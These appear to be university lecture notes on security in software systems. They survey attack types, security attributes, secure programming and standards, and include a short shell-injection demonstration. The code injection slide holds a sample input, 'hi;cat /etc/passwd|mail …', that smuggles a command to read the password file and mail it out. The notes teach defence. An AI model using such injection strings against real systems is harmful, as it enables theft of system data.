ISEC0511
Programming for Information
System Security
Lecture Notes #2
Security in Software Systems
Vulnerability and Attacks
A vulnerability is a weak point in a
system. There are several ways in which
vulnerabilities can be discovered.
Exploiting Vulnerability
Once a security vulnerability is known, how to
exploit it is also known.
What is not easily known is who has the device
with the vulnerability and how to reach it.
Scanning systems in the network is a way to
discover targets.
Passive Attacks
When a hacker eavesdrops on your system or
monitors the transmitted packets, it is a passive
attack.
Sensitive information such as credit card
information can be discovered using this
technique.
This is also called a sniffing attack.
Active Attacks
The original object is disturbed or manipulated.
The hacker can impersonate you and log into
the remote system as you.
Hacking
The process of exploiting vulnerabilities and
launching an attack on computers is called
hacking.
Hackers hack computers, networks, and
telephone systems for profit, sometimes even
for fun.
Social Engineering
Social engineering is a technique used by
adversaries to manipulate the social and
psychological behavior of people to gain access
to information or do something that they will
not do in a different social setup.
Identity Theft
Identity theft is carried out to obtain a financial
identity, personal identity, medical records, or a
business or commercial identity.
Phishing
E-mail scam
Various Security Attacks
Brute-Force Attacks
Trying combinations to find the right
password or encryption key.
The attack is also used by researchers to
test the strength of an encryption algorithm.
Key strength grows exponentially with key size.
Authentication Attacks
In a telecom network, a device is
authenticated.
In a data network, a user is authenticated.
Dictionary Attack
Passwords should never be based on known
information.
The attack is also used to discover emails.
Replay Attack
In a replay attack, the adversary replays a
genuine message captured earlier to perform a
function intended for a legitimate user.
Ali Baba did not know the meaning of this
phrase; he heard the bandits use it.
Password Guessing
Knowing a user ID is relatively easy.
It is likely that we have a common user ID and
password for many accounts (banks, ATM,
emails, credit cards).
Password Sniffing
Spoofing attack
Spoofed IP
Spoofed emails
Spoofed SMS
Denial-of-Service Attacks
Distributed Denial-of-Service Attack
Half-Open Attack or SYN-Flooding
Denial of Service through User-ID Lock Attack
Ping of Death Attack
Smurf Attack
Packet Sniffer
Tcpdump and Ethereal (Wireshark)
Taking Control of Application
To take control of applications, you
need to make the user execute your code.
Overflow Attack
Stack Smashing Attack
Remote Procedure Call Attack
Code Injection Attacks
echo Welcome $1 $2 $3 $4
hi;cat /etc/passwd|mail [email protected]
Luring Attack
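The code injection case above, as an added example that is not part of the original lecture notes: the slide's Welcome script called through a re-parsed command string, then with the input passed as a single argument, then behind an allowlist check. The function names and the harmless `echo INJECTED` input are constructed for illustration.

```shell
#!/bin/sh
# Constructed input with the same shape as the slide's "hi;cat ..." string;
# the injected command is a harmless echo so its effect is visible.
PAYLOAD='hi;echo INJECTED'

# Vulnerable: the input is pasted into a command line that a shell parses
# again, so ';' ends the echo and starts a second command.
greet_unsafe() {
    sh -c "echo Welcome $1"
}

# Hardened: the input stays one quoted argument and is only printed as data.
greet_safe() {
    printf 'Welcome %s\n' "$1"
}

# Allowlist check: accept non-empty input made of letters and digits only.
is_valid_name() {
    case "$1" in
        '' | *[!A-Za-z0-9]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Validate first, then greet; reject anything outside the allowlist.
greet_checked() {
    if is_valid_name "$1"; then
        greet_safe "$1"
    else
        echo "rejected input" >&2
        return 1
    fi
}

echo "--- unsafe ---";  greet_unsafe "$PAYLOAD"
echo "--- safe ---";    greet_safe "$PAYLOAD"
echo "--- checked ---"; greet_checked "$PAYLOAD" || echo "(input refused)"
```

The unsafe call prints two lines because the second command ran; the safe call prints the whole input back as one line of text.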
Computer Security
Physical Security
Operating System Security
Shell Security
File System Security
Kernel Security
Network Security
Typical Security in Data Network
Counter External Threats
Stopping Attacker
The application should use all possible
defenses to protect itself and all its data.
Firewall
Intrusion Detection System
Intrusion Prevention System
Honeypot
Penetration Test and Ethical Hacking
Security Programming
A programmer has a responsibility to
ensure that the code written is secure
and safe with minimum or no known
vulnerability.
Security bugs have a very high impact.
Security Attributes
Confidentiality
A mechanism through which we keep the
meaning of information or data secret.
This property is also known as privacy or
encryption.
Integrity
A property through which you can detect
whether your message or data have been
corrupted or tampered with.
Availability
It is necessary that the service is available
for the period it is advertised.
Any attack on availability is called a DoS
attack.
Authentication
Authentication is a process by which we
validate the identity of the parties.
In nonrepudiation, we establish the identity
of these parties beyond any doubt.
Digital signatures can achieve
nonrepudiation.
One-factor authentication, Two-factor
authentication, Multi-factor authentication.
Authorization
Usage constraints on objects based on
security level or privilege of the subject.
This attribute is also called fine-grained
access control or role-based security.
Accounting
Accounting is the process by which the
usage of a service is metered.
Audit trails and logs for transactions in an
application can also be considered as part
of the accounting information.
These files need security so that
adversaries cannot tamper with or delete them.
Anonymity
A property through which the user is
anonymous to the external world.
Secured Programming
In secured programming you use the
security attributes to ensure that the
input data are secure.
Also, you use these attributes to ensure
that the processed information is
secured.
You make the data and information
secure using security algorithms,
security protocols, and secured
programming.
Safe Programming
You as a programmer need to ensure
that whatever program you write does
not have any security vulnerability.
The bottom line is that the programs
you write need to be robust and
failsafe.
Vulnerability Remediation
To minimize the security risks posed by
software vulnerabilities, a two-step approach
is necessary.
First, minimize the number of vulnerabilities
in the software that is being developed, and
Second, minimize the number of
vulnerabilities in the software that have
already been deployed.
Reducing the number of new
vulnerabilities in the new software is
the focus of secured and safe
programming, while removing existing
vulnerabilities is the focus of
vulnerability remediation.
Database Security
Database Authentication
Database Privileges
Secure Metadata
Customize Access to Information
Views and Stored procedures
High Availability Database
Database Encryption
Security Standards
Public-Key Cryptographic Standards
Standards accepted as de facto standards for
public-key cryptography, helping interoperability
between applications that use cryptography for
security.
CERT: Computer Emergency Response Team
– www.cert.org
OWASP: Open Web Application Security
Project – www.owasp.org
NIST: National Institute of Standards
and Technology – csrc.nist.gov
OASIS: Organization for the
Advancement of Structured Information
Standards
SSE-CMM: System Security Engineering
Capability Maturity Model – www.ssecmm.org
ISO17799
Readings
Architecting Secure Software Systems,
Chapter 1.